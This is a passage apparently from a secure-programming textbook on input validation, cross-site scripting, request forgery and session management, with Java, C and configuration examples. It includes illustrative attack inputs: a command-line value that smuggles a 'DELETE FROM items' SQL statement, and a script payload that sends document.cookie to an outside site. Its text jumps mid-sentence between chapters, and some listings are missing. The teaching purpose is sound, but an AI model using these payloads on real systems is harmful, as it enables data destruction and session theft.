    • Validate all input. Validate every piece of input the program uses. Make it easy to verify that all input is validated before it is used.
    • Validate input from all sources. Validate input from all sources, including command-line parameters, configuration files, database queries, environment variables, network services, registry values, system properties, temporary files, and any other source outside your program.
    • Establish trust boundaries. Store trusted and untrusted data separately to ensure that input validation is always performed.
• How to validate
    • Use strong input validation. Use the strongest form of input validation applicable in a given context. Prefer indirect selection or whitelisting.
    • Avoid blacklisting. Do not fall back on blacklisting just because stronger input validation is difficult to put in place.
    • Don’t mistake usability for security. Do not confuse validation that an application performs for usability purposes with input validation for security.
    • Reject bad data. Reject data that fail validation checks. Do not repair or sanitize the data for further use.
    • Make good input validation the default. Use a layer of abstraction around important or dangerous operations to ensure that security checks are always performed and that dangerous conditions cannot occur.
    • Always check input length. Validate input against a minimum expected length and a maximum expected length.
    • Bound numeric input. Check numeric input against both a maximum value and a minimum value as part of input validation.
Watch out for operations that might be able to carry a number beyond its maximum or minimum value.

The chapter wraps up with a look at metacharacter vulnerabilities, including SQL injection, command injection, and log forging.

5.1 What to Validate

Most interesting programs accept input from multiple sources and operate on the data they accept in a variety of ways. Input validation plays a critical role in security from the point a program first reads data from an outside source until it uses the data in any number of security-relevant contexts. This section discusses the two sides of input validation: the kinds of input that require validation and the kinds of operations that depend on validated input.

Validate All Input

These three words are the mantra for the entire chapter: validate all input. When you meditate on them, consider the meaning of both validate and input in the context of your application. Define input broadly. Think beyond just the data that a user delivers to your front door. If an application consists of more than one process, validate the input to each process, even if that input is only supposed to arrive from another part of the application. Validate input even if it is delivered over a secure connection, arrives from a "trusted" source, or is protected by strict file permissions. Validate input even for programs that are accessed by only trusted users. Don’t make optimistic assumptions about any piece of input inherited from the environment, including Registry values and path names. Every check you perform denies your adversary an opportunity and provides you an added degree of assurance.

Input validation routines can be broken down into two major groups: syntax checks that test the format of the input, and semantic checks that determine whether the input is appropriate, given the application’s logic and function.
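The distinction between the two groups can be sketched in C as follows. The scenario (a user requesting a report by name), the 32-character limit, the allowed character set, and all function names are hypothetical and chosen only to illustrate the split: the syntax check needs no application state, while the semantic check depends on what this particular user is allowed to request.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MAX_NAME_LEN 32  /* hypothetical limit for this sketch */

/* Syntax check: 1 to MAX_NAME_LEN characters drawn from [a-z0-9_]. */
int is_well_formed_name(const char *name)
{
    size_t len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len < 1 || len > MAX_NAME_LEN)
        return 0;
    /* strspn() counts the leading characters that are in the allowed set. */
    return strspn(name, "abcdefghijklmnopqrstuvwxyz0123456789_") == len;
}

/* Semantic check: the name must be one that this user may request. */
int is_permitted_name(const char *name,
                      const char *const allowed[], size_t n_allowed)
{
    size_t i;

    assert(name != NULL);  /* callers run the syntax check first */
    for (i = 0; i < n_allowed; i++) {
        if (strcmp(name, allowed[i]) == 0)
            return 1;
    }
    return 0;
}

/* Accepts the input only if it passes the syntax check and then the semantic check. */
int validate_report_name(const char *name,
                         const char *const allowed[], size_t n_allowed)
{
    return is_well_formed_name(name) &&
           is_permitted_name(name, allowed, n_allowed);
}
```

Here a name such as q3_sales can pass the syntax check and still be rejected because it is not in the caller's list, while ../etc/passwd never reaches the semantic check at all.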
Syntax checking can often be decoupled from the application logic and placed close to the point where the data enter the program, while semantic checks commonly need to appear alongside application logic because the two are so closely related.

While you’re coding, make it difficult or impossible for a programmer to come along later and add an input point to the application without extending the validation logic to cover it. The application should route all input through validation logic, and the validation logic should reject any input that cannot be validated. Make it impossible for a programmer to say “I forgot to do input validation.”

Static Analysis: Identifying the Attack Surface

An easy way to use static analysis to assist in code review is to simply have a tool point out all the places where the application accepts input. The first time you try it, you’re likely to be surprised at the number of locations that turn up.

The collection of places where an application accepts input can loosely be termed the application’s attack surface [Howard and LeBlanc, 2002]. In a static analysis tool, the attack surface consists of all the program entry points and source function calls, that is, the set of function calls that are invoked externally or that introduce user input into the program. Generally, the larger the attack surface, the more thought programmers will have to put into input validation.

The companion CD includes a sample C program named qwik-smtpd.
Chapter 14, “Source Code Analysis Exercises for C,” walks through the process of analyzing qwik-smtpd using static analysis, but as a preview, the static analysis tool identifies one entry point in qwik-smtpd.c:

86: int main(int argc, char* argv[])

And five source functions:

182: while(getline(inputLine,1024) != EOF)
383: fgets(line, sizeof(line), chk);
506: while((c = getchar()) != EOF)
584: while((c = getc(config)) != EOF)
614: while((c = getc(config)) != EOF)

Validate Input from All Sources

Do not allow the security of your software to depend on the keen intellect, deep insight, or goodwill of the people configuring, deploying, and maintaining it. Perform input validation not only on user input, but also on data from any source outside your code. This list should include, but not be limited to, the following:

• Command-line parameters
• Configuration files
• Data retrieved from a database
• Environment variables
• Network services
• Registry values
• System properties
• Temporary files

We routinely encounter developers who would like to wipe various sources of input off their security radar. Essentially, their argument boils down to this: “I’m not expecting anyone to attack me from those vectors. Why should I take the time and effort required to make them secure?” That attitude leads to exactly the kinds of blind spots that make an attacker’s job easy. A short-sighted programmer might think, “If someone can change a system property, they will already have won.” Then an attacker will find a way to make a small alteration to a system file or script, or might find a way to leverage an honest configuration mistake. In either case, the lack of input validation becomes a stepping stone the attacker uses on the way to a full-blown system compromise.

Not all forms of input are equal. Input from a configuration file will almost certainly receive different treatment than input from a user.
But regardless of the source, all input should be subject to validation for at least consistency and syntax.

Next we walk through examples of security vulnerabilities caused by unvalidated input from sources that are sometimes ignored: configuration files, command-line parameters, database access, and network services. We return to the topic of unexpected input sources in other parts of the book. Chapter 9 discusses cross-site scripting vulnerabilities caused by input from the database, and Chapter 12, “Privileged Programs,” looks at privilege-escalation attacks based on data from temporary files and environment variables.

Configuration Files

Version 1.3.29 of Apache’s mod_regex and mod_rewrite modules contain a buffer overflow vulnerability caused by programmers who put too much faith in their configuration [Malo, 2003]. A typical Apache configuration allows directory-by-directory configuration through files named .htaccess. With this setup, users are given the opportunity to add their own configuration files to control the way the contents of each of their directories are displayed. The problem with mod_regex and mod_rewrite is that they expected regular expressions in their configuration directives to have nine or fewer capturing groups. (Capturing groups are a way of treating multiple characters as a single entity in regular expressions and are indicated by statements enclosed in parentheses.) Ten or more capturing groups cause a buffer overflow. This is the kind of input the program expects:

RewriteRule ^/img(.*) /var/www/img$1

But the following input causes a buffer overflow:

RewriteRule ^/img(.)(.)(.)(.)(.)(.)(.)(.)(.)(.*) \
    /var/www/img$1$2$3$4$5$6$7$8$9$10

Example 5.1 lists the culprit code.
The code shows where Apache uses the ten-element array regmatch to hold back references to captures, and where it relies on the unbounded number of captures specified in a configuration file, later read into p->regexp->re_nsub, to bound the number of references to write into that fixed-size array. Example 5.2 shows how the code was fixed by changing both the array and the code that fills it to use the same compile-time constant.

This bug opens up a number of opportunities for attack. First, users who have permission only to upload data to a Web server can now exploit the buffer overflow to run code as the Web server. Second, an attacker with no privileges whatsoever now only needs to find a way to upload a file into the server’s content tree to be able to execute code. In both cases, a bug in configuration parsing opens the server to new lines of attack.

Example 5.1 A buffer overflow in Apache. A user who can modify an .htaccess file can crash the server or execute arbitrary code as the server by writing a regular expression with more than nine capturing groups.

int ap_regexec(const regex_t *preg, const char *string,
               size_t nmatch, regmatch_t pmatch[], int eflags);

typedef struct backrefinfo {
    char *source;
    int nsub;
    regmatch_t regmatch[10];
} backrefinfo;
...
else { /* it is really a regexp pattern, so apply it */
    rc = (ap_regexec(p->regexp, input,
                     p->regexp->re_nsub+1, regmatch, 0) == 0);

Example 5.2 The fix to the Apache buffer overflow. The array declaration and the code that fills the buffer now both refer to the same constant.

typedef struct backrefinfo {
    char *source;
    int nsub;
    regmatch_t regmatch[AP_MAX_REG_MATCH];
} backrefinfo;
...
else { /* it is really a regexp pattern, so apply it */
    rc = (ap_regexec(p->regexp, input,
                     AP_MAX_REG_MATCH, regmatch, 0) == 0);

Command-Line Parameters

Up through Version 2.1.9, Hibernate, a popular open source package for object/relational mapping, contains an excellent example of what not to do with command-line input. (Thanks to Yekaterina Tsipenyuk O’Neil for pointing out this issue.) The Java version of Hibernate’s SchemaExport tool accepts a command-line parameter named "--delimiter", which it uses to separate SQL commands in the scripts it generates. Example 5.3 shows how it works in a simplified form.

Example 5.3 Version 2.1.9 of Hibernate’s SchemaExport tool allows SQL injection through the command line.

String delimiter;
for (int i=0; i < args.length; i++) {
    if ( args[i].startsWith("--delimiter=") ) {
        delimiter = args[i].substring(12);
    }
}
...
for (int i = 0; i < dropSQL.length; i++) {
    try {
        String formatted = dropSQL[i];
        if (delimiter!=null) formatted += delimiter;
        ...
        fileOutput.write( formatted + "\n" );
    }

The --delimiter option exists so that a user can specify the separator that should appear between SQL statements. Typical values might be a semicolon or a carriage return and a line feed. But the program does not place any restrictions on the argument’s value, so from a command-line parameter, you can write any string you want into the generated SQL script, including additional SQL commands. For example, if a simple SELECT query was provided with --delimiter ';', it would generate a script to execute the following command:

SELECT * FROM items WHERE owner = "admin";

But if the same query was issued with the malicious option --delimiter '; DELETE FROM items;', it would generate a script that cleans out the items table with the following commands:

SELECT * FROM items WHERE owner = "admin"; DELETE FROM items;

From a naïve perspective, this is of no consequence.
After all, if you wanted to execute a malicious query, you could always specify it directly, right? This line of reasoning contains an implicit and dangerous set of assumptions about how the program will be used. It is now incumbent upon any programmer who wants to write a wrapper script around SchemaExport to understand that the --delimiter command-line parameter affects a query in an unconstrained fashion. The name delimiter suggests that the value should be something short, such as a piece of punctuation, but the program does no input validation at all; therefore, it is not acceptable to give control of this parameter to someone who is not authorized to write arbitrary commands into the output file. Want to write a Web front end for provisioning a new database? This code makes it easy for that new front end to unwittingly turn complete control of the new database over to the provisioner because now anyone who controls the input to SchemaExport can insert arbitrary SQL commands into the output. This is a security meltdown waiting to happen. Database Queries Unlike input received directly from an anonymous user, information from the database must often be granted a level of trust. In many cases, it is impossible to verify that data from the database are “correct” because the database is often the only source of truth. On the other hand, programs that rely on the database should verify that information retrieved from the database is well formed and meets reasonable expectations. Do not blindly rely on the database to ensure that your application will behave correctly. The following are just two examples of validation that can be performed on database data: • Check to make sure that only one row exists for values that are expected to be unique. The presence of two entries might indicate that an attacker managed to insert a falsified data entry. Database features, such as triggers or uniqueness constraints, might not be in effect. 
For example, you might find that a user has two entries indicating their account balance. The code in Example 5.4 makes no effort to verify the number of rows returned by the database; it simply uses the first row found. Example 5.5 gives a revised version that checks to make sure the database returns only one row.

Example 5.4 This code makes no effort to verify the number of rows the query returns; it simply uses the first row found.

ResultSet rs = stmt.executeQuery();
rs.next();
int balance = rs.getInt(1);

Example 5.5 This revised code checks that the query returns only one row.

ResultSet rs = stmt.executeQuery();
if (!rs.next()) {
    throw new LookupException("no balance row");
}
if (!rs.isLast()) {
    throw new LookupException("more than one balance row");
}
int balance = rs.getInt(1);

Static Analysis: The Database Is Input, Too

Use static analysis to identify situations in which the program doesn’t pay attention to the number of rows a ResultSet contains. You can do this with a structural rule that looks for calls to ResultSet.next() that appear as call statements (and, therefore, are not in a predicate).

Structural rule:

FunctionCall fc:
  (fc.function is [name == "next" and
    enclosingClass.supers contains
      [Class: name == "java.sql.ResultSet"]])
  and (fc in [CallStatement:])

This rule flags the call to rs.next() in Example 5.4, but not the one in Example 5.5.

• Check to make sure that fields contain safe, sane content that is free from metacharacter attacks. An attacker could manage to bypass input validation and attempt a stored injection or cross-site scripting attack. Even if the input validation for your application is perfect, the attacker might be able to get information into the database through other programs or channels.
For example, a nightly batch update from a partner company might update a user’s account information to include a string containing a This little bit of JavaScript expects the variable userName to have a vanilla value, such as this: Dave when it instead has a value such as this: "+new Image().src =''+document.cookie+" Then the blacklist has no effect. This attack string results in the user’s cookies being sent to an unauthorized Web site, but the attacker could just as easily insert any arbitrary JavaScript operation. Blacklisting is particularly dangerous because it might work well enough to lull developers into a false sense of security by preventing rudimentary attacks, such as blocking attackers from including ! Then the Web browser will execute the contents of evil.js. Initially, this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on his or her own computer? Figure 9.4 illustrates a potential attack scenario that takes place in four steps: 1. An attacker creates a malicious URL and uses an inviting e-mail message or some other social engineering trick to get a victim to visit the URL. 2. By clicking the link, the user unwittingly sends the malicious code up to the vulnerable Web application. 306 Chapter 9 Web Applications 3. The vulnerable Web application reflects the code back to the victim’s browser. 4. The victim’s browser executes the code as though it had legitimately originated from the application, and transmits confidential information back to the attacker. For example, if the vulnerable JSP in Example 9.2 was hosted at, an attacker might e-mail the following link to prospective victims: Click here This mechanism of exploiting vulnerable Web applications is called reflected cross-site scripting because the Web application reflects the attack back to the victim. 1. Attacker sends malicious link to victim. 2. Victim clicks link, makes request to vulnerable application. 
3. Application includes attacker’s code in HTTP response. 4. Browser executes attacker’s code, sends confidential data back to attacker.

Figure 9.4 Reflected cross-site scripting (diagram labels: Attacker, Victim Browser, Application with XSS vulnerability).

If an application produces active Web pages that use request page parameters directly (for instance, by using JavaScript to parse the URL), the application could be vulnerable to reflected XSS without the need for any dynamic processing on the server. Example 9.3 is a sample script that comes with the Treeview JavaScript tree menu widget. The code looks at the URL, splits out the page parameters, and evaluates each one as a JavaScript statement. If this JavaScript is already stored in the victim’s browser cache, the attack will never even be transmitted to the server.

9.1 Input and Output Validation for the Web 307

Example 9.3 Cross-site scripting is not just a server-side concern. This JavaScript sample code from the Treeview menu widget is susceptible to XSS attacks that never leave the client.

Example 9.4 lists another kind of XSS vulnerability. This time, the value of name is read from a database. As in Example 9.2, the code behaves correctly when the value of name is benign, but it does nothing to prevent an attack if the value of name contains malicious data.

Example 9.4 The following Servlet code segment queries a database for an employee with a given ID and prints the corresponding employee’s name.

String query = "select * from emp where id=?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setString(1, eid);
ResultSet rs = stmt.executeQuery();
if (rs != null) {
    rs.next();
    String name = rs.getString("name");
    out.println("Employee Name: " + name);
}

This code might appear less dangerous because name is read from a database, but if the value originates from externally supplied or user-controlled data, the database can be a conduit for attacks.
Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user’s Web browser. This form of vulnerability is called stored cross-site scripting. Because the application stores the malicious content, there is a possibility that a single attack will affect multiple users without any action on their part. This means that teaching users not to click on links from untrusted sources will do nothing to prevent this sort of attack.

On a historical note, XSS got its start this way with Web sites that offered a “guestbook” to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code.

The application that stores the malicious data in the database might not be the same one that retrieves it. This is particularly nasty because different front-end applications could have different interfaces or use different communication protocols. Each application might do appropriate input validation in its own context, but by connecting the different applications to the same data store, the whole system can become vulnerable. Figure 9.5 illustrates one such scenario.

Figure 9.5 Stored cross-site scripting can involve multiple applications. (1) Attacker sends malicious data to application 1. (2) Application 1 writes malicious data to database. (3) Application 2 reads malicious data from database. (4) Application 2 delivers attack to victim.

The First XSS Worm

The first self-propagating cross-site scripting attack we are aware of hit the MySpace Web site in 2005. The user samy took advantage of a stored cross-site scripting vulnerability so that any MySpace users who viewed his profile would automatically add him to their own profile. In the end, MySpace had to go completely offline to clean up the mess.
Samy wrote a detailed explanation of the way he bypassed the MySpace defenses [samy, 2005]. It illustrates a variety of techniques for exploiting cross-site scripting vulnerabilities, and it is a perfect example of a failed attempt at blacklisting. Samy wrote the following: 1. MySpace blocks a lot of tags. In fact, they only seem to allow , s, and
s … maybe a few others (s, I think). They wouldn’t allow

If an administrator for visits the malicious page while she has an active session on the site, she will unwittingly create an account for the attacker. This is a cross-site request forgery attack. It is possible because the application does not have a way to determine the provenance of the request: it could be a legitimate action chosen by the user or a faked action set up by an attacker. The attacker does not get to see the Web page that the bogus request generates, so the technique is useful only for requests that alter the state of the application.

Most Web browsers send an HTTP header named referer along with each request. The referer header is supposed to contain the URL of the referring page, but attackers can forge it, so the referer header is not useful for determining the provenance of a request [Klein, 2006].

Applications that pass the session identifier on the URL rather than as a cookie do not have this problem because there is no way for the attacker to access the valid session identifier and include it as part of the bogus request. (Refer to Section 9.3 for more details on maintaining session state.)

For applications that use session cookies, the form must include some piece of information that the back-end form handler can use to validate the provenance of the request. One way to do that is to include a random request identifier on the form, like this:
Name of new user: Password for new user:
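A random request identifier of this kind could be produced and checked along the following lines. This is a minimal sketch rather than the book's implementation: the class and method names are hypothetical, the 128-bit length is an assumption borrowed from the session identifier guidance in Section 9.3, and storing the expected value in the user's session is left to the surrounding application.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class RequestIdentifier {
    private static final SecureRandom RANDOM = new SecureRandom();

    /** Returns a fresh identifier built from 128 bits of cryptographically secure random data. */
    public static String newToken() {
        byte[] bytes = new byte[16];
        RANDOM.nextBytes(bytes);
        // URL-safe Base64 without padding, so the value can sit in a hidden form field.
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    /** True only if the submitted value equals the value issued for this session. */
    public static boolean matches(String expected, String submitted) {
        if (expected == null || submitted == null) {
            return false; // a missing identifier is treated as a failed check
        }
        return MessageDigest.isEqual(
                expected.getBytes(StandardCharsets.UTF_8),
                submitted.getBytes(StandardCharsets.UTF_8));
    }
}
```

The form handler would call matches() with the value it issued and the value that came back, and reject the request when the result is false.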
Then the back-end logic can validate the request identifier before processing the rest of the form data. The request identifier can be unique to each new instance of a form or can be shared across every form for a particular session.

9.3 Maintaining Session State

From the beginning of this chapter, we’ve said that HTTP was not designed with applications in mind. If you’ve been looking for more evidence to support that assertion, look no further. Because HTTP is stateless, building almost any sort of sophisticated application requires passing a session identifier back and forth to associate a user’s previous requests with her next. Session identifiers can be passed back and forth as URL parameters, but today most applications handle them with cookies. The most common reason to use a session identifier is to allow a user to authenticate only once but carry on a series of interactions with the application. That means the security of the application depends on it being very difficult for an attacker to make use of the session identifier for an authenticated user.

Good HTTP session management means picking strong session identifiers and ensuring that they’re issued and revoked at appropriate points in the program. This section looks at the following topics:

• Writing a session management interface is tricky. In most cases, your effort is best spent selecting an application container that offers good session management facilities rather than creating your own session-management facilities.
• For Web application containers that allow the session identifier length to be specified in a configuration file, make sure the session identifier contains at least 128 bits of random data, to prevent attackers from hijacking users’ session identifiers.
• Enforce a maximum session idle time and a maximum session lifetime.
• Make sure the user has a way to terminate the session.
• Ensure that whenever a user is authenticated, the current session identifier is invalidated and a new one is issued.

Use Strong Session Identifiers

Your best bet for a strong, hassle-free system for creating and managing session identifiers is to use the mechanism built into your application container. This is not a sure thing, though; do not trust your application container until you have confirmed the session identifier length and the source of randomness used to generate the identifiers.

Use session identifiers that include at least 128 bits of data generated by a cryptographically secure random number generator. A shorter session identifier leaves the application open to brute-force session-guessing attacks: If attackers can guess an authenticated user’s session identifier, they might be able to take over the user’s session. The rest of this explanation details a back-of-the-envelope justification for a 128-bit session identifier. The expected number of seconds required to guess a valid session identifier is given by this equation:

\[ \frac{2^{B} + 1}{2 A \cdot S} \]

where the variables are defined as follows:

• B is the number of bits of entropy in the session identifier.
• A is the number of guesses an attacker can try each second.
• S is the number of valid session identifiers available to be guessed at any given time.

The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier, no matter what the identifier’s length was. Assuming that the session identifiers are being generated using a good source of random numbers, we estimate the number of bits of entropy in a session identifier to be half its total number of bits. For realistic identifier lengths, this is possible, though perhaps optimistic.
A lower bound on the number of valid session identifiers available to be guessed is the number of users who are active on a site at any given moment. However, any users who abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64-bit session identifier, assume 32 bits of entropy. For a large Web site, assume that the attacker can try 10 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 6 hours. Now assume a 128-bit session identifier that provides 64 bits of entropy. With a very large Web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these somewhat extreme assumptions in favor of the attacker, the expected time to successfully guess a valid session identifier is greater than 292 years. See the section “Random Numbers” in Chapter 11, “Privacy and Secrets,” for a more detailed discussion of gathering entropy and generating secure random numbers. No standardized approach exists for controlling the length of the session identifier used by a Servlet container. Example 9.11 shows how to control the session identifier length for BEA WebLogic. The length of the session identifier is specified as the number of characters in the identifier. Each character is a lowercase letter, an uppercase letter, or a number, so there are 62 possible values for each character. To get 128 pseudo-random bits, the identifier must contain at least 22 characters (128/log2(62) = 21.5). Our experimentation leads us to believe that the first 3 characters are not randomly generated, so WebLogic needs to be configured to create session identifiers of length 25 characters. 
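The arithmetic in this explanation can be reproduced with a short program. The sketch below is illustrative only: the class and method names are made up, and the inputs are simply the figures assumed in the text (32 or 64 bits of entropy, the stated guess rates and session counts, and a 62-symbol alphabet).

```java
public class SessionGuessEstimate {

    /** Expected seconds to guess a valid identifier: (2^B + 1) / (2 * A * S). */
    public static double expectedSeconds(int entropyBits, double guessesPerSecond,
                                         double validIdentifiers) {
        double searchSpace = Math.pow(2.0, entropyBits) + 1.0;
        return searchSpace / (2.0 * guessesPerSecond * validIdentifiers);
    }

    /** Smallest number of characters from the given alphabet that carries `bits` bits. */
    public static int charsNeeded(int bits, int alphabetSize) {
        double bitsPerChar = Math.log(alphabetSize) / Math.log(2.0);
        return (int) Math.ceil(bits / bitsPerChar);
    }

    public static void main(String[] args) {
        // 64-bit identifier, 32 bits of entropy, 10 guesses/s, 10,000 valid identifiers
        double hours = expectedSeconds(32, 10, 10_000) / 3600.0;
        // 128-bit identifier, 64 bits of entropy, 10,000 guesses/s, 100,000 valid identifiers
        double years = expectedSeconds(64, 10_000, 100_000) / (3600.0 * 24 * 365);

        System.out.printf("64-bit identifier: about %.2f hours%n", hours);
        System.out.printf("128-bit identifier: about %.1f years%n", years);
        System.out.println("Characters for 128 bits with 62 symbols: "
                + charsNeeded(128, 62));
    }
}
```

Under these inputs the first estimate comes out just under 6 hours and the second a little over 292 years, in line with the figures quoted above, and 22 characters are needed before the three non-random WebLogic characters are added.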
Example 9.11 For BEA WebLogic, to use a 128-bit session identifier, the weblogic.xml configuration file should include a session-descriptor element named IDLength with a value of 25.

<session-descriptor>
  <session-param>
    <param-name>IDLength</param-name>
    <param-value>25</param-value>
  </session-param>
  ...
</session-descriptor>

Static Analysis: Avoid Weak Session Identifiers

Use static analysis to identify programs configured to use weak session identifiers. The following rule will flag session identifiers configured to be less than 25 characters long in weblogic.xml:

Configuration rule:

File Pattern: weblogic.xml
XPath Expression:
  /weblogic-web-app/session-descriptor/
    session-param[normalize-space(param-name)=
    'IDLength' and param-value < 25]

Enforce a Session Idle Timeout and a Maximum Session Lifetime

Limiting a session’s lifetime is a trade-off between security and usability. From a convenience standpoint, it would be best if sessions never had to be terminated. But from a security standpoint, invalidating a user’s session after a timeout period protects the user and the system in the following ways:

• It limits the period of exposure for users who fail to invalidate their session by logging out.
• It reduces the average number of valid session identifiers available for an attacker to guess.
• It makes it impossible for an attacker to obtain a valid session identifier and then keep it alive indefinitely.

Session Idle Timeout

Be consistent across applications so that people in your organization know how to set the parameters correctly and so that your users understand what to expect.
For any container that implements the Servlet specification, you can configure the session timeout in web.xml like this (the value is expressed in minutes):

<session-config>
  <session-timeout>30</session-timeout>
</session-config>

You can also set the session timeout on an individual session using the setMaxInactiveInterval() method:

// Argument specifies idle timeout in seconds
session.setMaxInactiveInterval(1800);

Maximum Session Lifetime

The Servlet specification does not mandate a mechanism for setting a maximum session lifetime, and not all Servlet containers implement a proprietary mechanism. You can implement your own session lifetime limiter as a Servlet filter. The doFilter() method in Example 9.12 stashes the current time in a session the first time a request is made using the session. If the session is still in use after the maximum session lifetime, the filter invalidates the session.

Example 9.12 This Servlet filter invalidates a session after a maximum session lifetime.

public void doFilter(ServletRequest request,
                     ServletResponse response,
                     FilterChain chain)
        throws IOException, ServletException {
    if (request instanceof HttpServletRequest) {
        HttpServletRequest hres = (HttpServletRequest) request;
        // false: do not create a session if none exists
        HttpSession sess = hres.getSession(false);
        if (sess != null) {
            long now = System.currentTimeMillis();
            long then = sess.getCreationTime();
            // both values are in milliseconds, so the limit must be too
            if ((now - then) > MAX_SESSION_LIFETIME) {
                sess.invalidate();
            }
        }
    }
    chain.doFilter(request, response);
}

Static Analysis: Ensure Users Can Log Out

Include a logout link that allows users to invalidate their HTTP sessions. Allowing users to terminate their own session protects both the user and the system in the following ways:

• A user at a public terminal might have no other way to prevent the next person at the terminal from accessing their account.
• By terminating the session, the user protects his account even if an attacker subsequently takes control of the client computer.
• By eliminating sessions that are not being used, the server reduces the average number of valid session identifiers available for an attacker to guess.

The code behind a logout link might look something like this:

request.getSession(true).invalidate();

In applications that use the Java HttpSession object for session management, use static analysis to determine whether the application calls invalidate() on the session. Manually audit calls to invalidate() to determine whether users can invalidate their sessions by logging out. If users cannot log out, the program does not provide its users the right tools to protect their sessions. The following rule identifies all calls to HttpSession.invalidate():

Structural rule:

FunctionCall fc:
  (fc.function is [name == "invalidate" and
    enclosingClass.supers contains
      [Class: name == "javax.servlet.http.HttpSession"]])

Begin a New Session upon Authentication

Always generate a new session when a user authenticates, even if an existing session identifier is already associated with the user.

If session identifiers are sufficiently long and sufficiently random, guessing a session identifier is an impractical avenue of attack. But if the application does not generate a new session identifier whenever a user authenticates, the potential exists for a session fixation attack, in which the attacker forces a known session identifier onto a user.

In a generic session fixation exploit, an attacker creates a new session in a Web application without logging in and records the associated session identifier. The attacker then causes the victim to authenticate against the server using that session identifier, which results in the attacker gaining access to the user’s account through the active session. Imagine the following scenario:

1. The attacker walks up to a public terminal and navigates to the login page for a poorly built Web application.
The application issues a session cookie as part of rendering the login page.
2. The attacker records the session cookie and walks away from the terminal.
3. A few minutes later, a victim approaches the terminal and logs in.
4. Because the application continues to use the same session cookie it originally created for the attacker, the attacker now knows the victim’s session identifier and can take control of the session from another computer.

This attack scenario requires several things for the attacker to have a chance at success: access to an unmonitored public terminal, the capability to keep the compromised session active, and a victim interested in logging into the vulnerable application on the public terminal. In most circumstances, the first two challenges are surmountable, given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, as long as the site is reasonably popular and the attacker is not picky about who the victim will be. For example, a Web e-mail kiosk would be a prime target.

An attacker can do away with the need for a shared public terminal if the application server makes it possible to force a session identifier on a user by means of a link on a Web page or in an e-mail message. For instance, Apache Tomcat allows an attacker to specify a session identifier as a URL parameter like this:

If the value of the jsessionid parameter refers to an existing session, Tomcat will begin using it as the session identifier.

To limit session fixation, a Web application must issue a new session identifier at the same time it authenticates a user. Many application servers make this more difficult by providing separate facilities for managing authorization and session management.
For example, the Java Servlet specification requires a container to provide the URL j_security_check, but it does not require that the container issue a new session identifier when authentication succeeds. This leads to a vulnerability in the standard recommended method for setting up a login page, which involves creating a form that looks like this:
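[Listing not preserved: an HTML form that posts to j_security_check, with input fields labeled "Username:" and "Password:".]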
If the application has already created a session before the user authenticates, some implementations of j_security_check (including the one in Tomcat) will continue to use the already established session identifier. If that identifier were supplied by an attacker, the attacker would have access to the authenticated session.

It is worth noting that, by default, Web browsers associate cookies with the top-level domain for a given URL. If multiple applications reside under the same top-level domain, a vulnerability in one application can allow an attacker to fix the session identifier that will be used in all interactions with any application on the domain.

If your application needs to maintain state across an authentication boundary, the code in Example 9.13 outlines the session management portion of the authentication process. Note that it creates the new session before authenticating the user to avoid a race condition in which an authenticated user is briefly associated with the old session identifier.

Example 9.13 This login method invalidates any existing session and creates a new session before attempting to authenticate the user.
    public void doLogin(HttpServletRequest request) {
      HttpSession oldSession = request.getSession(false);
      if (oldSession != null) {
        // copy the attributes out first: once a session has been
        // invalidated, reading from it throws IllegalStateException
        Map<String, Object> saved = new HashMap<String, Object>();
        Enumeration names = oldSession.getAttributeNames();
        while (names.hasMoreElements()) {
          String name = (String) names.nextElement();
          saved.put(name, oldSession.getAttribute(name));
        }
        oldSession.invalidate();
        // create new session if there was an old session
        HttpSession newSession = request.getSession(true);
        // transfer attributes from old to new
        for (Map.Entry<String, Object> entry : saved.entrySet()) {
          newSession.setAttribute(entry.getKey(), entry.getValue());
        }
      }
      authenticate(request); // username/password checked here
    }

9.4 Using the Struts Framework for Input Validation

Over the past few years, the Struts Web Application Framework has been the most popular starting point for building Java Web applications that follow the Model-View-Controller (MVC) pattern. Although other frameworks are gaining in popularity, we still see more Struts applications than anything else, so we use Struts to demonstrate the ins and outs of using an MVC framework for input validation.

In the MVC pattern, Struts plays the role of the controller, making it responsible for dispatching update requests to the model and invoking the view to display the model to the user. Because Struts adheres to the J2EE standard, it’s easy to use other parts of the J2EE standard (such as EJB and JSP) to implement the Model and View portions of an application.

Although our advice in this section is geared specifically toward Struts, the concepts we discuss apply to many Java Web application frameworks that include a validation component, such as JSF, Spring, Tapestry, and WebWork. The bottom line is that using a Web validation framework for security purposes takes some concerted effort. Expect to spend some time thinking through the security implications of the framework. Don’t expect that the defaults will do the right thing for you.
This section does a deep dive on Struts so that you’ll have a complete example to work from when you sit down to look at the framework you’re using.

The rest of this section assumes that the reader is comfortable with basic Struts concepts. For background reading on Struts, we recommend the Struts home page, Struts in Action [Husted et al., 2002], and Programming Jakarta Struts, 2nd Edition [Cavaness, 2004].

Struts has little to offer when it comes to security. It’s not that Struts causes inherent security problems, but simply that it does not have many features that directly address security. Struts does have one major feature that, if used properly, can play an important role in preventing common input validation errors: the Struts Validator. The Validator is meant for checking user input to make sure that it is of appropriate form and content before it is turned over to an application’s business logic. For example, the Validator might be used to ensure the following:

• Boolean values are only T or F.
• Free-form strings are of a reasonable length and composition.
• Phone numbers contain exactly 10 digits.

The Struts Validator provides a convenient format for specifying these kinds of checks. It also offers a good deal of flexibility around providing feedback to the user when a check fails.

For the sake of completeness, we define a few commonly used Struts terms here. This is not intended to be a thorough Struts primer.

• An ActionForm object holds data from the HTTP request.
• A form bean mapping is a configuration file entry. It maps the name of an ActionForm class to a logical name used in the rest of the Struts configuration files.
